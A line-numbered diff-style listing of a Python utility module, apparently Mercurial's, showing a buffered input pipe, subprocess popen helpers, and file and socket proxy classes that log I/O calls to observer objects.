382 self._lenbuf = 0
381 self._lenbuf = 0
383
382
384 @property
383 @property
385 def hasbuffer(self):
384 def hasbuffer(self):
386 """True is any data is currently buffered
385 """True is any data is currently buffered
387
386
388 This will be used externally a pre-step for polling IO. If there is
387 This will be used externally a pre-step for polling IO. If there is
389 already data then no polling should be set in place."""
388 already data then no polling should be set in place."""
390 return bool(self._buffer)
389 return bool(self._buffer)
391
390
392 @property
391 @property
393 def closed(self):
392 def closed(self):
394 return self._input.closed
393 return self._input.closed
395
394
396 def fileno(self):
395 def fileno(self):
397 return self._input.fileno()
396 return self._input.fileno()
398
397
399 def close(self):
398 def close(self):
400 return self._input.close()
399 return self._input.close()
401
400
402 def read(self, size):
401 def read(self, size):
403 while (not self._eof) and (self._lenbuf < size):
402 while (not self._eof) and (self._lenbuf < size):
404 self._fillbuffer()
403 self._fillbuffer()
405 return self._frombuffer(size)
404 return self._frombuffer(size)
406
405
407 def readline(self, *args, **kwargs):
406 def readline(self, *args, **kwargs):
408 if 1 < len(self._buffer):
407 if 1 < len(self._buffer):
409 # this should not happen because both read and readline end with a
408 # this should not happen because both read and readline end with a
410 # _frombuffer call that collapse it.
409 # _frombuffer call that collapse it.
411 self._buffer = [''.join(self._buffer)]
410 self._buffer = [''.join(self._buffer)]
412 self._lenbuf = len(self._buffer[0])
411 self._lenbuf = len(self._buffer[0])
413 lfi = -1
412 lfi = -1
414 if self._buffer:
413 if self._buffer:
415 lfi = self._buffer[-1].find('\n')
414 lfi = self._buffer[-1].find('\n')
416 while (not self._eof) and lfi < 0:
415 while (not self._eof) and lfi < 0:
417 self._fillbuffer()
416 self._fillbuffer()
418 if self._buffer:
417 if self._buffer:
419 lfi = self._buffer[-1].find('\n')
418 lfi = self._buffer[-1].find('\n')
420 size = lfi + 1
419 size = lfi + 1
421 if lfi < 0: # end of file
420 if lfi < 0: # end of file
422 size = self._lenbuf
421 size = self._lenbuf
423 elif 1 < len(self._buffer):
422 elif 1 < len(self._buffer):
424 # we need to take previous chunks into account
423 # we need to take previous chunks into account
425 size += self._lenbuf - len(self._buffer[-1])
424 size += self._lenbuf - len(self._buffer[-1])
426 return self._frombuffer(size)
425 return self._frombuffer(size)
427
426
428 def _frombuffer(self, size):
427 def _frombuffer(self, size):
429 """return at most 'size' data from the buffer
428 """return at most 'size' data from the buffer
430
429
431 The data are removed from the buffer."""
430 The data are removed from the buffer."""
432 if size == 0 or not self._buffer:
431 if size == 0 or not self._buffer:
433 return ''
432 return ''
434 buf = self._buffer[0]
433 buf = self._buffer[0]
435 if 1 < len(self._buffer):
434 if 1 < len(self._buffer):
436 buf = ''.join(self._buffer)
435 buf = ''.join(self._buffer)
437
436
438 data = buf[:size]
437 data = buf[:size]
439 buf = buf[len(data):]
438 buf = buf[len(data):]
440 if buf:
439 if buf:
441 self._buffer = [buf]
440 self._buffer = [buf]
442 self._lenbuf = len(buf)
441 self._lenbuf = len(buf)
443 else:
442 else:
444 self._buffer = []
443 self._buffer = []
445 self._lenbuf = 0
444 self._lenbuf = 0
446 return data
445 return data
447
446
448 def _fillbuffer(self):
447 def _fillbuffer(self):
449 """read data to the buffer"""
448 """read data to the buffer"""
450 data = os.read(self._input.fileno(), _chunksize)
449 data = os.read(self._input.fileno(), _chunksize)
451 if not data:
450 if not data:
452 self._eof = True
451 self._eof = True
453 else:
452 else:
454 self._lenbuf += len(data)
453 self._lenbuf += len(data)
455 self._buffer.append(data)
454 self._buffer.append(data)
456
455
457 return data
456 return data
458
457
459 def mmapread(fp):
458 def mmapread(fp):
460 try:
459 try:
461 fd = getattr(fp, 'fileno', lambda: fp)()
460 fd = getattr(fp, 'fileno', lambda: fp)()
462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 except ValueError:
462 except ValueError:
464 # Empty files cannot be mmapped, but mmapread should still work. Check
463 # Empty files cannot be mmapped, but mmapread should still work. Check
465 # if the file is empty, and if so, return an empty buffer.
464 # if the file is empty, and if so, return an empty buffer.
466 if os.fstat(fd).st_size == 0:
465 if os.fstat(fd).st_size == 0:
467 return ''
466 return ''
468 raise
467 raise
469
468
470 def popen2(cmd, env=None, newlines=False):
469 def popen2(cmd, env=None, newlines=False):
471 # Setting bufsize to -1 lets the system decide the buffer size.
470 # Setting bufsize to -1 lets the system decide the buffer size.
472 # The default for bufsize is 0, meaning unbuffered. This leads to
471 # The default for bufsize is 0, meaning unbuffered. This leads to
473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 close_fds=closefds,
474 close_fds=closefds,
476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 universal_newlines=newlines,
476 universal_newlines=newlines,
478 env=env)
477 env=env)
479 return p.stdin, p.stdout
478 return p.stdin, p.stdout
480
479
481 def popen3(cmd, env=None, newlines=False):
480 def popen3(cmd, env=None, newlines=False):
482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 return stdin, stdout, stderr
482 return stdin, stdout, stderr
484
483
485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 close_fds=closefds,
486 close_fds=closefds,
488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 stderr=subprocess.PIPE,
488 stderr=subprocess.PIPE,
490 universal_newlines=newlines,
489 universal_newlines=newlines,
491 env=env)
490 env=env)
492 return p.stdin, p.stdout, p.stderr, p
491 return p.stdin, p.stdout, p.stderr, p
493
492
494 class fileobjectproxy(object):
493 class fileobjectproxy(object):
495 """A proxy around file objects that tells a watcher when events occur.
494 """A proxy around file objects that tells a watcher when events occur.
496
495
497 This type is intended to only be used for testing purposes. Think hard
496 This type is intended to only be used for testing purposes. Think hard
498 before using it in important code.
497 before using it in important code.
499 """
498 """
500 __slots__ = (
499 __slots__ = (
501 r'_orig',
500 r'_orig',
502 r'_observer',
501 r'_observer',
503 )
502 )
504
503
505 def __init__(self, fh, observer):
504 def __init__(self, fh, observer):
506 object.__setattr__(self, r'_orig', fh)
505 object.__setattr__(self, r'_orig', fh)
507 object.__setattr__(self, r'_observer', observer)
506 object.__setattr__(self, r'_observer', observer)
508
507
509 def __getattribute__(self, name):
508 def __getattribute__(self, name):
510 ours = {
509 ours = {
511 r'_observer',
510 r'_observer',
512
511
513 # IOBase
512 # IOBase
514 r'close',
513 r'close',
515 # closed if a property
514 # closed if a property
516 r'fileno',
515 r'fileno',
517 r'flush',
516 r'flush',
518 r'isatty',
517 r'isatty',
519 r'readable',
518 r'readable',
520 r'readline',
519 r'readline',
521 r'readlines',
520 r'readlines',
522 r'seek',
521 r'seek',
523 r'seekable',
522 r'seekable',
524 r'tell',
523 r'tell',
525 r'truncate',
524 r'truncate',
526 r'writable',
525 r'writable',
527 r'writelines',
526 r'writelines',
528 # RawIOBase
527 # RawIOBase
529 r'read',
528 r'read',
530 r'readall',
529 r'readall',
531 r'readinto',
530 r'readinto',
532 r'write',
531 r'write',
533 # BufferedIOBase
532 # BufferedIOBase
534 # raw is a property
533 # raw is a property
535 r'detach',
534 r'detach',
536 # read defined above
535 # read defined above
537 r'read1',
536 r'read1',
538 # readinto defined above
537 # readinto defined above
539 # write defined above
538 # write defined above
540 }
539 }
541
540
542 # We only observe some methods.
541 # We only observe some methods.
543 if name in ours:
542 if name in ours:
544 return object.__getattribute__(self, name)
543 return object.__getattribute__(self, name)
545
544
546 return getattr(object.__getattribute__(self, r'_orig'), name)
545 return getattr(object.__getattribute__(self, r'_orig'), name)
547
546
548 def __nonzero__(self):
547 def __nonzero__(self):
549 return bool(object.__getattribute__(self, r'_orig'))
548 return bool(object.__getattribute__(self, r'_orig'))
550
549
551 __bool__ = __nonzero__
550 __bool__ = __nonzero__
552
551
553 def __delattr__(self, name):
552 def __delattr__(self, name):
554 return delattr(object.__getattribute__(self, r'_orig'), name)
553 return delattr(object.__getattribute__(self, r'_orig'), name)
555
554
556 def __setattr__(self, name, value):
555 def __setattr__(self, name, value):
557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558
557
559 def __iter__(self):
558 def __iter__(self):
560 return object.__getattribute__(self, r'_orig').__iter__()
559 return object.__getattribute__(self, r'_orig').__iter__()
561
560
562 def _observedcall(self, name, *args, **kwargs):
561 def _observedcall(self, name, *args, **kwargs):
563 # Call the original object.
562 # Call the original object.
564 orig = object.__getattribute__(self, r'_orig')
563 orig = object.__getattribute__(self, r'_orig')
565 res = getattr(orig, name)(*args, **kwargs)
564 res = getattr(orig, name)(*args, **kwargs)
566
565
567 # Call a method on the observer of the same name with arguments
566 # Call a method on the observer of the same name with arguments
568 # so it can react, log, etc.
567 # so it can react, log, etc.
569 observer = object.__getattribute__(self, r'_observer')
568 observer = object.__getattribute__(self, r'_observer')
570 fn = getattr(observer, name, None)
569 fn = getattr(observer, name, None)
571 if fn:
570 if fn:
572 fn(res, *args, **kwargs)
571 fn(res, *args, **kwargs)
573
572
574 return res
573 return res
575
574
576 def close(self, *args, **kwargs):
575 def close(self, *args, **kwargs):
577 return object.__getattribute__(self, r'_observedcall')(
576 return object.__getattribute__(self, r'_observedcall')(
578 r'close', *args, **kwargs)
577 r'close', *args, **kwargs)
579
578
580 def fileno(self, *args, **kwargs):
579 def fileno(self, *args, **kwargs):
581 return object.__getattribute__(self, r'_observedcall')(
580 return object.__getattribute__(self, r'_observedcall')(
582 r'fileno', *args, **kwargs)
581 r'fileno', *args, **kwargs)
583
582
584 def flush(self, *args, **kwargs):
583 def flush(self, *args, **kwargs):
585 return object.__getattribute__(self, r'_observedcall')(
584 return object.__getattribute__(self, r'_observedcall')(
586 r'flush', *args, **kwargs)
585 r'flush', *args, **kwargs)
587
586
588 def isatty(self, *args, **kwargs):
587 def isatty(self, *args, **kwargs):
589 return object.__getattribute__(self, r'_observedcall')(
588 return object.__getattribute__(self, r'_observedcall')(
590 r'isatty', *args, **kwargs)
589 r'isatty', *args, **kwargs)
591
590
592 def readable(self, *args, **kwargs):
591 def readable(self, *args, **kwargs):
593 return object.__getattribute__(self, r'_observedcall')(
592 return object.__getattribute__(self, r'_observedcall')(
594 r'readable', *args, **kwargs)
593 r'readable', *args, **kwargs)
595
594
596 def readline(self, *args, **kwargs):
595 def readline(self, *args, **kwargs):
597 return object.__getattribute__(self, r'_observedcall')(
596 return object.__getattribute__(self, r'_observedcall')(
598 r'readline', *args, **kwargs)
597 r'readline', *args, **kwargs)
599
598
600 def readlines(self, *args, **kwargs):
599 def readlines(self, *args, **kwargs):
601 return object.__getattribute__(self, r'_observedcall')(
600 return object.__getattribute__(self, r'_observedcall')(
602 r'readlines', *args, **kwargs)
601 r'readlines', *args, **kwargs)
603
602
604 def seek(self, *args, **kwargs):
603 def seek(self, *args, **kwargs):
605 return object.__getattribute__(self, r'_observedcall')(
604 return object.__getattribute__(self, r'_observedcall')(
606 r'seek', *args, **kwargs)
605 r'seek', *args, **kwargs)
607
606
608 def seekable(self, *args, **kwargs):
607 def seekable(self, *args, **kwargs):
609 return object.__getattribute__(self, r'_observedcall')(
608 return object.__getattribute__(self, r'_observedcall')(
610 r'seekable', *args, **kwargs)
609 r'seekable', *args, **kwargs)
611
610
612 def tell(self, *args, **kwargs):
611 def tell(self, *args, **kwargs):
613 return object.__getattribute__(self, r'_observedcall')(
612 return object.__getattribute__(self, r'_observedcall')(
614 r'tell', *args, **kwargs)
613 r'tell', *args, **kwargs)
615
614
616 def truncate(self, *args, **kwargs):
615 def truncate(self, *args, **kwargs):
617 return object.__getattribute__(self, r'_observedcall')(
616 return object.__getattribute__(self, r'_observedcall')(
618 r'truncate', *args, **kwargs)
617 r'truncate', *args, **kwargs)
619
618
620 def writable(self, *args, **kwargs):
619 def writable(self, *args, **kwargs):
621 return object.__getattribute__(self, r'_observedcall')(
620 return object.__getattribute__(self, r'_observedcall')(
622 r'writable', *args, **kwargs)
621 r'writable', *args, **kwargs)
623
622
624 def writelines(self, *args, **kwargs):
623 def writelines(self, *args, **kwargs):
625 return object.__getattribute__(self, r'_observedcall')(
624 return object.__getattribute__(self, r'_observedcall')(
626 r'writelines', *args, **kwargs)
625 r'writelines', *args, **kwargs)
627
626
628 def read(self, *args, **kwargs):
627 def read(self, *args, **kwargs):
629 return object.__getattribute__(self, r'_observedcall')(
628 return object.__getattribute__(self, r'_observedcall')(
630 r'read', *args, **kwargs)
629 r'read', *args, **kwargs)
631
630
632 def readall(self, *args, **kwargs):
631 def readall(self, *args, **kwargs):
633 return object.__getattribute__(self, r'_observedcall')(
632 return object.__getattribute__(self, r'_observedcall')(
634 r'readall', *args, **kwargs)
633 r'readall', *args, **kwargs)
635
634
636 def readinto(self, *args, **kwargs):
635 def readinto(self, *args, **kwargs):
637 return object.__getattribute__(self, r'_observedcall')(
636 return object.__getattribute__(self, r'_observedcall')(
638 r'readinto', *args, **kwargs)
637 r'readinto', *args, **kwargs)
639
638
640 def write(self, *args, **kwargs):
639 def write(self, *args, **kwargs):
641 return object.__getattribute__(self, r'_observedcall')(
640 return object.__getattribute__(self, r'_observedcall')(
642 r'write', *args, **kwargs)
641 r'write', *args, **kwargs)
643
642
644 def detach(self, *args, **kwargs):
643 def detach(self, *args, **kwargs):
645 return object.__getattribute__(self, r'_observedcall')(
644 return object.__getattribute__(self, r'_observedcall')(
646 r'detach', *args, **kwargs)
645 r'detach', *args, **kwargs)
647
646
648 def read1(self, *args, **kwargs):
647 def read1(self, *args, **kwargs):
649 return object.__getattribute__(self, r'_observedcall')(
648 return object.__getattribute__(self, r'_observedcall')(
650 r'read1', *args, **kwargs)
649 r'read1', *args, **kwargs)
651
650
652 class observedbufferedinputpipe(bufferedinputpipe):
651 class observedbufferedinputpipe(bufferedinputpipe):
653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
652 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654
653
655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
654 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 bypass ``fileobjectproxy``. Because of this, we need to make
655 bypass ``fileobjectproxy``. Because of this, we need to make
657 ``bufferedinputpipe`` aware of these operations.
656 ``bufferedinputpipe`` aware of these operations.
658
657
659 This variation of ``bufferedinputpipe`` can notify observers about
658 This variation of ``bufferedinputpipe`` can notify observers about
660 ``os.read()`` events. It also re-publishes other events, such as
659 ``os.read()`` events. It also re-publishes other events, such as
661 ``read()`` and ``readline()``.
660 ``read()`` and ``readline()``.
662 """
661 """
663 def _fillbuffer(self):
662 def _fillbuffer(self):
664 res = super(observedbufferedinputpipe, self)._fillbuffer()
663 res = super(observedbufferedinputpipe, self)._fillbuffer()
665
664
666 fn = getattr(self._input._observer, r'osread', None)
665 fn = getattr(self._input._observer, r'osread', None)
667 if fn:
666 if fn:
668 fn(res, _chunksize)
667 fn(res, _chunksize)
669
668
670 return res
669 return res
671
670
672 # We use different observer methods because the operation isn't
671 # We use different observer methods because the operation isn't
673 # performed on the actual file object but on us.
672 # performed on the actual file object but on us.
674 def read(self, size):
673 def read(self, size):
675 res = super(observedbufferedinputpipe, self).read(size)
674 res = super(observedbufferedinputpipe, self).read(size)
676
675
677 fn = getattr(self._input._observer, r'bufferedread', None)
676 fn = getattr(self._input._observer, r'bufferedread', None)
678 if fn:
677 if fn:
679 fn(res, size)
678 fn(res, size)
680
679
681 return res
680 return res
682
681
683 def readline(self, *args, **kwargs):
682 def readline(self, *args, **kwargs):
684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
683 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685
684
686 fn = getattr(self._input._observer, r'bufferedreadline', None)
685 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 if fn:
686 if fn:
688 fn(res)
687 fn(res)
689
688
690 return res
689 return res
691
690
692 PROXIED_SOCKET_METHODS = {
691 PROXIED_SOCKET_METHODS = {
693 r'makefile',
692 r'makefile',
694 r'recv',
693 r'recv',
695 r'recvfrom',
694 r'recvfrom',
696 r'recvfrom_into',
695 r'recvfrom_into',
697 r'recv_into',
696 r'recv_into',
698 r'send',
697 r'send',
699 r'sendall',
698 r'sendall',
700 r'sendto',
699 r'sendto',
701 r'setblocking',
700 r'setblocking',
702 r'settimeout',
701 r'settimeout',
703 r'gettimeout',
702 r'gettimeout',
704 r'setsockopt',
703 r'setsockopt',
705 }
704 }
706
705
707 class socketproxy(object):
706 class socketproxy(object):
708 """A proxy around a socket that tells a watcher when events occur.
707 """A proxy around a socket that tells a watcher when events occur.
709
708
710 This is like ``fileobjectproxy`` except for sockets.
709 This is like ``fileobjectproxy`` except for sockets.
711
710
712 This type is intended to only be used for testing purposes. Think hard
711 This type is intended to only be used for testing purposes. Think hard
713 before using it in important code.
712 before using it in important code.
714 """
713 """
715 __slots__ = (
714 __slots__ = (
716 r'_orig',
715 r'_orig',
717 r'_observer',
716 r'_observer',
718 )
717 )
719
718
720 def __init__(self, sock, observer):
719 def __init__(self, sock, observer):
721 object.__setattr__(self, r'_orig', sock)
720 object.__setattr__(self, r'_orig', sock)
722 object.__setattr__(self, r'_observer', observer)
721 object.__setattr__(self, r'_observer', observer)
723
722
724 def __getattribute__(self, name):
723 def __getattribute__(self, name):
725 if name in PROXIED_SOCKET_METHODS:
724 if name in PROXIED_SOCKET_METHODS:
726 return object.__getattribute__(self, name)
725 return object.__getattribute__(self, name)
727
726
728 return getattr(object.__getattribute__(self, r'_orig'), name)
727 return getattr(object.__getattribute__(self, r'_orig'), name)
729
728
730 def __delattr__(self, name):
729 def __delattr__(self, name):
731 return delattr(object.__getattribute__(self, r'_orig'), name)
730 return delattr(object.__getattribute__(self, r'_orig'), name)
732
731
733 def __setattr__(self, name, value):
732 def __setattr__(self, name, value):
734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735
734
736 def __nonzero__(self):
735 def __nonzero__(self):
737 return bool(object.__getattribute__(self, r'_orig'))
736 return bool(object.__getattribute__(self, r'_orig'))
738
737
739 __bool__ = __nonzero__
738 __bool__ = __nonzero__
740
739
741 def _observedcall(self, name, *args, **kwargs):
740 def _observedcall(self, name, *args, **kwargs):
742 # Call the original object.
741 # Call the original object.
743 orig = object.__getattribute__(self, r'_orig')
742 orig = object.__getattribute__(self, r'_orig')
744 res = getattr(orig, name)(*args, **kwargs)
743 res = getattr(orig, name)(*args, **kwargs)
745
744
746 # Call a method on the observer of the same name with arguments
745 # Call a method on the observer of the same name with arguments
747 # so it can react, log, etc.
746 # so it can react, log, etc.
748 observer = object.__getattribute__(self, r'_observer')
747 observer = object.__getattribute__(self, r'_observer')
749 fn = getattr(observer, name, None)
748 fn = getattr(observer, name, None)
750 if fn:
749 if fn:
751 fn(res, *args, **kwargs)
750 fn(res, *args, **kwargs)
752
751
753 return res
752 return res
754
753
755 def makefile(self, *args, **kwargs):
754 def makefile(self, *args, **kwargs):
756 res = object.__getattribute__(self, r'_observedcall')(
755 res = object.__getattribute__(self, r'_observedcall')(
757 r'makefile', *args, **kwargs)
756 r'makefile', *args, **kwargs)
758
757
759 # The file object may be used for I/O. So we turn it into a
758 # The file object may be used for I/O. So we turn it into a
760 # proxy using our observer.
759 # proxy using our observer.
761 observer = object.__getattribute__(self, r'_observer')
760 observer = object.__getattribute__(self, r'_observer')
762 return makeloggingfileobject(observer.fh, res, observer.name,
761 return makeloggingfileobject(observer.fh, res, observer.name,
763 reads=observer.reads,
762 reads=observer.reads,
764 writes=observer.writes,
763 writes=observer.writes,
765 logdata=observer.logdata,
764 logdata=observer.logdata,
766 logdataapis=observer.logdataapis)
765 logdataapis=observer.logdataapis)
767
766
768 def recv(self, *args, **kwargs):
767 def recv(self, *args, **kwargs):
769 return object.__getattribute__(self, r'_observedcall')(
768 return object.__getattribute__(self, r'_observedcall')(
770 r'recv', *args, **kwargs)
769 r'recv', *args, **kwargs)
771
770
772 def recvfrom(self, *args, **kwargs):
771 def recvfrom(self, *args, **kwargs):
773 return object.__getattribute__(self, r'_observedcall')(
772 return object.__getattribute__(self, r'_observedcall')(
774 r'recvfrom', *args, **kwargs)
773 r'recvfrom', *args, **kwargs)
775
774
776 def recvfrom_into(self, *args, **kwargs):
775 def recvfrom_into(self, *args, **kwargs):
777 return object.__getattribute__(self, r'_observedcall')(
776 return object.__getattribute__(self, r'_observedcall')(
778 r'recvfrom_into', *args, **kwargs)
777 r'recvfrom_into', *args, **kwargs)
779
778
780 def recv_into(self, *args, **kwargs):
779 def recv_into(self, *args, **kwargs):
781 return object.__getattribute__(self, r'_observedcall')(
780 return object.__getattribute__(self, r'_observedcall')(
782 r'recv_info', *args, **kwargs)
781 r'recv_info', *args, **kwargs)
783
782
784 def send(self, *args, **kwargs):
783 def send(self, *args, **kwargs):
785 return object.__getattribute__(self, r'_observedcall')(
784 return object.__getattribute__(self, r'_observedcall')(
786 r'send', *args, **kwargs)
785 r'send', *args, **kwargs)
787
786
788 def sendall(self, *args, **kwargs):
787 def sendall(self, *args, **kwargs):
789 return object.__getattribute__(self, r'_observedcall')(
788 return object.__getattribute__(self, r'_observedcall')(
790 r'sendall', *args, **kwargs)
789 r'sendall', *args, **kwargs)
791
790
792 def sendto(self, *args, **kwargs):
791 def sendto(self, *args, **kwargs):
793 return object.__getattribute__(self, r'_observedcall')(
792 return object.__getattribute__(self, r'_observedcall')(
794 r'sendto', *args, **kwargs)
793 r'sendto', *args, **kwargs)
795
794
796 def setblocking(self, *args, **kwargs):
795 def setblocking(self, *args, **kwargs):
797 return object.__getattribute__(self, r'_observedcall')(
796 return object.__getattribute__(self, r'_observedcall')(
798 r'setblocking', *args, **kwargs)
797 r'setblocking', *args, **kwargs)
799
798
800 def settimeout(self, *args, **kwargs):
799 def settimeout(self, *args, **kwargs):
801 return object.__getattribute__(self, r'_observedcall')(
800 return object.__getattribute__(self, r'_observedcall')(
802 r'settimeout', *args, **kwargs)
801 r'settimeout', *args, **kwargs)
803
802
804 def gettimeout(self, *args, **kwargs):
803 def gettimeout(self, *args, **kwargs):
805 return object.__getattribute__(self, r'_observedcall')(
804 return object.__getattribute__(self, r'_observedcall')(
806 r'gettimeout', *args, **kwargs)
805 r'gettimeout', *args, **kwargs)
807
806
808 def setsockopt(self, *args, **kwargs):
807 def setsockopt(self, *args, **kwargs):
809 return object.__getattribute__(self, r'_observedcall')(
808 return object.__getattribute__(self, r'_observedcall')(
810 r'setsockopt', *args, **kwargs)
809 r'setsockopt', *args, **kwargs)
811
810
812 class baseproxyobserver(object):
811 class baseproxyobserver(object):
813 def _writedata(self, data):
812 def _writedata(self, data):
814 if not self.logdata:
813 if not self.logdata:
815 if self.logdataapis:
814 if self.logdataapis:
816 self.fh.write('\n')
815 self.fh.write('\n')
817 self.fh.flush()
816 self.fh.flush()
818 return
817 return
819
818
820 # Simple case writes all data on a single line.
819 # Simple case writes all data on a single line.
821 if b'\n' not in data:
820 if b'\n' not in data:
822 if self.logdataapis:
821 if self.logdataapis:
823 self.fh.write(': %s\n' % stringutil.escapedata(data))
822 self.fh.write(': %s\n' % stringutil.escapedata(data))
824 else:
823 else:
825 self.fh.write('%s> %s\n'
824 self.fh.write('%s> %s\n'
826 % (self.name, stringutil.escapedata(data)))
825 % (self.name, stringutil.escapedata(data)))
827 self.fh.flush()
826 self.fh.flush()
828 return
827 return
829
828
830 # Data with newlines is written to multiple lines.
829 # Data with newlines is written to multiple lines.
831 if self.logdataapis:
830 if self.logdataapis:
832 self.fh.write(':\n')
831 self.fh.write(':\n')
833
832
834 lines = data.splitlines(True)
833 lines = data.splitlines(True)
835 for line in lines:
834 for line in lines:
836 self.fh.write('%s> %s\n'
835 self.fh.write('%s> %s\n'
837 % (self.name, stringutil.escapedata(line)))
836 % (self.name, stringutil.escapedata(line)))
838 self.fh.flush()
837 self.fh.flush()
839
838
840 class fileobjectobserver(baseproxyobserver):
839 class fileobjectobserver(baseproxyobserver):
841 """Logs file object activity."""
840 """Logs file object activity."""
842 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
841 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
843 logdataapis=True):
842 logdataapis=True):
844 self.fh = fh
843 self.fh = fh
845 self.name = name
844 self.name = name
846 self.logdata = logdata
845 self.logdata = logdata
847 self.logdataapis = logdataapis
846 self.logdataapis = logdataapis
848 self.reads = reads
847 self.reads = reads
849 self.writes = writes
848 self.writes = writes
850
849
851 def read(self, res, size=-1):
850 def read(self, res, size=-1):
852 if not self.reads:
851 if not self.reads:
853 return
852 return
854 # Python 3 can return None from reads at EOF instead of empty strings.
853 # Python 3 can return None from reads at EOF instead of empty strings.
855 if res is None:
854 if res is None:
856 res = ''
855 res = ''
857
856
858 if self.logdataapis:
857 if self.logdataapis:
859 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
858 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
860
859
861 self._writedata(res)
860 self._writedata(res)
862
861
863 def readline(self, res, limit=-1):
862 def readline(self, res, limit=-1):
864 if not self.reads:
863 if not self.reads:
865 return
864 return
866
865
867 if self.logdataapis:
866 if self.logdataapis:
868 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
867 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
869
868
870 self._writedata(res)
869 self._writedata(res)
871
870
872 def readinto(self, res, dest):
871 def readinto(self, res, dest):
873 if not self.reads:
872 if not self.reads:
874 return
873 return
875
874
876 if self.logdataapis:
875 if self.logdataapis:
877 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
876 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
878 res))
877 res))
879
878
880 data = dest[0:res] if res is not None else b''
879 data = dest[0:res] if res is not None else b''
881 self._writedata(data)
880 self._writedata(data)
882
881
883 def write(self, res, data):
882 def write(self, res, data):
884 if not self.writes:
883 if not self.writes:
885 return
884 return
886
885
887 # Python 2 returns None from some write() calls. Python 3 (reasonably)
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
888 # returns the integer bytes written.
887 # returns the integer bytes written.
889 if res is None and data:
888 if res is None and data:
890 res = len(data)
889 res = len(data)
891
890
892 if self.logdataapis:
891 if self.logdataapis:
893 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
892 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
894
893
895 self._writedata(data)
894 self._writedata(data)
896
895
897 def flush(self, res):
896 def flush(self, res):
898 if not self.writes:
897 if not self.writes:
899 return
898 return
900
899
901 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
900 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
902
901
903 # For observedbufferedinputpipe.
902 # For observedbufferedinputpipe.
904 def bufferedread(self, res, size):
903 def bufferedread(self, res, size):
905 if not self.reads:
904 if not self.reads:
906 return
905 return
907
906
908 if self.logdataapis:
907 if self.logdataapis:
909 self.fh.write('%s> bufferedread(%d) -> %d' % (
908 self.fh.write('%s> bufferedread(%d) -> %d' % (
910 self.name, size, len(res)))
909 self.name, size, len(res)))
911
910
912 self._writedata(res)
911 self._writedata(res)
913
912
914 def bufferedreadline(self, res):
913 def bufferedreadline(self, res):
915 if not self.reads:
914 if not self.reads:
916 return
915 return
917
916
918 if self.logdataapis:
917 if self.logdataapis:
919 self.fh.write('%s> bufferedreadline() -> %d' % (
918 self.fh.write('%s> bufferedreadline() -> %d' % (
920 self.name, len(res)))
919 self.name, len(res)))
921
920
922 self._writedata(res)
921 self._writedata(res)
923
922
924 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
923 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
925 logdata=False, logdataapis=True):
924 logdata=False, logdataapis=True):
926 """Turn a file object into a logging file object."""
925 """Turn a file object into a logging file object."""
927
926
928 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
927 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
929 logdata=logdata, logdataapis=logdataapis)
928 logdata=logdata, logdataapis=logdataapis)
930 return fileobjectproxy(fh, observer)
929 return fileobjectproxy(fh, observer)
931
930
932 class socketobserver(baseproxyobserver):
931 class socketobserver(baseproxyobserver):
933 """Logs socket activity."""
932 """Logs socket activity."""
934 def __init__(self, fh, name, reads=True, writes=True, states=True,
933 def __init__(self, fh, name, reads=True, writes=True, states=True,
935 logdata=False, logdataapis=True):
934 logdata=False, logdataapis=True):
936 self.fh = fh
935 self.fh = fh
937 self.name = name
936 self.name = name
938 self.reads = reads
937 self.reads = reads
939 self.writes = writes
938 self.writes = writes
940 self.states = states
939 self.states = states
941 self.logdata = logdata
940 self.logdata = logdata
942 self.logdataapis = logdataapis
941 self.logdataapis = logdataapis
943
942
944 def makefile(self, res, mode=None, bufsize=None):
943 def makefile(self, res, mode=None, bufsize=None):
945 if not self.states:
944 if not self.states:
946 return
945 return
947
946
948 self.fh.write('%s> makefile(%r, %r)\n' % (
947 self.fh.write('%s> makefile(%r, %r)\n' % (
949 self.name, mode, bufsize))
948 self.name, mode, bufsize))
950
949
951 def recv(self, res, size, flags=0):
950 def recv(self, res, size, flags=0):
952 if not self.reads:
951 if not self.reads:
953 return
952 return
954
953
955 if self.logdataapis:
954 if self.logdataapis:
